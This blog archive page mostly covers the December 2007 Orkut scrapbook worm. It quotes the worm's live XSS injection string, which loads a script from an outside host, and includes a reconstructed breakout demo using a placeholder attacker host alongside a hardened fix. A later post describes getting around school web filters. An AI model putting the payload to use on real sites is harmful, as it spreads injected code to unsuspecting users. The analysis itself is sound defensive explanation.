Security: December 2007 Archives
Orkut finally posted a notice about the worm. I certainly appreciate that they worked quickly on fixing the problem. However, I still believe there should have been an ongoing dialog with their users. When you put together a security response plan, you need to include not only an engineering team, but also P.R. resources to handle communicating with the outside world. "Trust" is the most important commodity a social network has. The panic you feel when you think your account, and perhaps your computer, has been infected is not going to be erased by an after-the-fact message two days later. All social networks should have a plan in place that includes (at a minimum) telling people that a solution is being developed, and ideally includes periodic updates on the progress. Providing additional information about the problem as it becomes available would also be great, but the primary goal is to show that users' concerns are being taken seriously, and that people are actively working to fix the problem. Responsiveness, concern, and information will help ensure that people maintain their trust in your service.
I had to head off and get some sleep last night, so I didn't have time to try to track this down, but others did. I've attached the JavaScript code below for those who want to see it.
I have to say, I'm disappointed by Google's response time on this issue. I noticed the problem Tuesday evening around 10 or 11pm EST. As soon as I knew it was a worm I posted a support request to Orkut (which, btw, is not easy—they keep redirecting you to tips on protecting your computer). Once I had more details and posted my original link, I filed another report, this time through a security form (although the only way to do so was to claim that my account had been compromised). That was between midnight and 1am EST. This morning when I went to check around 7am EST, the worm was still spreading.
I would have hoped that they could have gotten the reports, paged the appropriate people, and then turned off scrapbooks, or disabled HTML scrapbooks, until things were under control. If that wasn't possible (and I understand that making on-the-fly code changes to a large distributed system is not always the simplest thing), then they should have shut Orkut down. And at the very least, I would expect to see an explanation and apology on Orkut.
The issue isn't whether or not the worm was dangerous. The issue is that I now don't trust Google to respond quickly the next time there's a worm. And the next one might not be so benign.
Ironically, this has caused a number of my friends (who like myself, haven't used Orkut in quite a while) to update their profiles. It may even increase Orkut's overall traffic in the States, since they've largely been forgotten here.
The original source file is no longer in place, so the worm has hopefully stopped. Since Google has posted nothing about it on the Orkut site or blog, I have no idea whether the underlying flaw has been fixed.
Looking at the code, my guess is that the hole is here:
"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";
Read as HTML, that looks like an odd attribute on an embedded Flash object, which is presumably why the HTML filter let it through. Read as JavaScript, it is something else entirely: the wmode="transparent'); closes a quoted string and the function call it sits in, the next statements create a script element pointing at virus.js and append it to the page's head, and the trailing escape(' re-opens a string so the rest of the scrap still parses. In other words, the filtered scrap was being dropped into a JavaScript string literal, and a payload containing '); gets to run its own statements. The result is arbitrary JavaScript execution in the context of the scrapbook page. Definitely not a good thing; such a script could do quite a bit of damage. I'm sure there are more detailed examinations of the problem on the net. Searching around, it's clear that this is probably the third variation of the exploit that has been used in recent days.
JavaScript code can be found below the fold.
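To make the breakout concrete, here is an added example (my own reconstruction, not the worm's code and not Orkut's). It assumes a template that concatenates filtered scrap HTML into a JavaScript string literal, runs the result against a stub DOM so it works offline in Node, and uses a placeholder host for the injected script URL rather than the real one. The hardened template shows the fix: emit the value as a properly escaped string literal instead of concatenating it.

```javascript
// Added example, not code from the worm or from Orkut. It reconstructs the
// failure mode seen in the scrap above: HTML that survived the tag filter is
// concatenated into a JavaScript string literal, so a value containing "');"
// closes that literal and runs its own statements. The template shape, the
// stub DOM and the script host are assumptions.

// Hypothetical vulnerable template: scrap HTML pasted into a JS string.
function vulnerableTemplate(scrapHtml) {
  return "escape('" + scrapHtml + "')";
}

// Hardened template: JSON.stringify escapes quotes, backslashes and control
// characters; the extra replacements keep "<" (which could end an inline
// <script> block) and the U+2028/U+2029 line terminators inside the literal.
function safeTemplate(scrapHtml) {
  const literal = JSON.stringify(scrapHtml)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return "escape(" + literal + ")";
}

// Minimal stand-in for the browser DOM: records <script> elements appended
// to <head>, which is what the worm's statements do.
function makeFakeDocument() {
  const appended = [];
  const head = { appendChild: (el) => appended.push(el) };
  return {
    appended,
    createElement: (tag) => ({ tagName: tag.toUpperCase(), src: "" }),
    getElementsByTagName: (tag) => (tag === "head" ? [head] : []),
  };
}

// Execute the generated JS against the stub DOM. Returns the URLs of any
// injected scripts and every string that escape() actually received.
function runTemplate(js) {
  const document = makeFakeDocument();
  const escapedArgs = [];
  const escapeStub = (s) => { escapedArgs.push(s); return s; };
  // "var script;" mirrors the worm's undeclared global without leaking one.
  new Function("document", "escape", "var script; " + js)(document, escapeStub);
  return {
    injected: document.appended.map((el) => el.src),
    escapedArgs,
  };
}

// Constructed payload with the same structure as the worm's scrap; the
// script host is a placeholder, not the real one.
const WORM_STYLE_SCRAP =
  '[/silver]<br/><embed src="http://www.orkut.com/LoL.aspx" ' +
  'type="application/x-shockwave-flash" wmode="transparent\'); ' +
  "script=document.createElement('script');" +
  "script.src='http://attacker.example/virus.js';" +
  "document.getElementsByTagName('head')[0].appendChild(script);" +
  "escape('\"width=\"1\" height=\"1\"></embed>";

// Runs both templates on the payload and returns what each one did.
function demo() {
  return {
    vulnerable: runTemplate(vulnerableTemplate(WORM_STYLE_SCRAP)),
    hardened: runTemplate(safeTemplate(WORM_STYLE_SCRAP)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const { vulnerable, hardened } = demo();
  console.log("vulnerable template injected:", vulnerable.injected);
  console.log("hardened template injected:", hardened.injected);
  console.log("hardened template passed the whole scrap to escape():",
    hardened.escapedArgs[0] === WORM_STYLE_SCRAP);
}
```

With the vulnerable template, escape() is called twice and a script with the placeholder URL lands in the stub head; with the hardened template, escape() is called once with the entire scrap, still containing the '); text, and nothing is injected. The lesson is that an HTML filter cannot protect a JavaScript context: whatever survives the filter still has to be encoded for the context it is written into.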
I haven't been able to find a copy of the source yet, but the method of transmission looks pretty straightforward.
You get an email notification (or find out on Orkut) that you have a new scrapbook entry. It's from a friend. It says:
2008 vem ai... que ele comece mto bem para vc ("2008 is coming... may it start really well for you")
There's no need to click on anything; just viewing it does the trick. The scrap deletes itself, and adds you to the Orkut Community "Infectados pelo Vírus do Orkut" ("Infected by the Orkut Virus"). That group, as I write this, is gaining members at a rate of at least one hundred per minute.
A quick (Google :-) translation of the description of the group produces the following:
CALM DOWN!
If you ended up in this community, rest assured that no data was stolen and nothing was done against your will; that is not my goal.
If I'm right, by the end of all this, this community should be packed with people.
This is just to show how dangerous Orkut can be: you got here without clicking on a single malicious link; everything happened just by reading scraps.
Orkut allows friend-to-friend scraps to contain HTML. Presumably there's a bug somewhere in the HTML filter that is allowing malicious JavaScript to get through.
It does not appear at first glance that the worm does anything more dangerous than pass itself on to one or more of your friends. I think it unlikely that it would be able to steal your password, although it could potentially access other private information.
[Update. According to a posting on the Community site by the author of the virus, it can be blocked by blocking Flash.]
How to protect yourself and not come back again
Well, many people don't like being added to the community; that is your right, although it is only a joke.
But just as I am doing it, someone else could do it to try to hurt someone.
Since some people asked, I will explain here how to protect yourself.
Firefox (easier):
- Install the Flashblock extension
[https://addons.mozilla.org/en-US/firefox/addon/433]
- Restart Firefox and you're done
If you don't have Firefox, download it here:
http://www.mozilla.com/en-US/firefox/
Internet Explorer:
- Go to the Tools menu -> Internet Options
- Click on the Security tab
- Under "Select a Web content zone", leave Internet selected
- Click Custom Level...
- Find the "ActiveX controls and plug-ins" section
- Disable the option "Run ActiveX controls and plug-ins"
With that you will no longer see YouTube videos, for example, either inside or outside Orkut, but at least you will be safe.
I suggest you download Firefox because it is easier to enable and disable.
Yesterday my daughter Shireen asked me again to help her get around the filters at school. She can get to her email, but she can't get to DeviantArt, where she posts photos and artwork. Nor can she use her IM client, and she'd wanted to ask me a question while she was at school. I pointed her at a web IM client that would probably work, and promised to set up an encrypted proxy server on our web site so she could browse wherever she wanted. I also pointed out that her problem is in miniature the same problem faced by millions of folks in Iran, China and other countries that try to restrict the flow of information to and from the internet.
While I can sympathize (in theory) with people who see the internet as a corrupting influence, I do not sympathize with the view of "the State as parent", and furthermore, I believe the correct solution to corrupting influences (whether you are a parent or a country) is education and knowledge—not hiding them under a rock and pretending they don't exist. If your meme can't win the battle of information, then it doesn't deserve to survive. (I suppose it's not terribly surprising that such a darwinist approach to ideas doesn't go over well with theocracies. :-) And of course in the case of Iran and China, two of the biggest censorship offenders (how nice to know that Iran is using American software to do the job), the censorship has far more to do with maintaining power than any particular ideology.
In any case, while looking for something completely different this morning, I came across the following Firefox web browser extension.
I actually hadn't realized that Iran blocked Flickr; there's an active Iranian community there.
I suppose I shouldn't be surprised. But it's a pity, Flickr's a great way to see what Iran really looks like right now.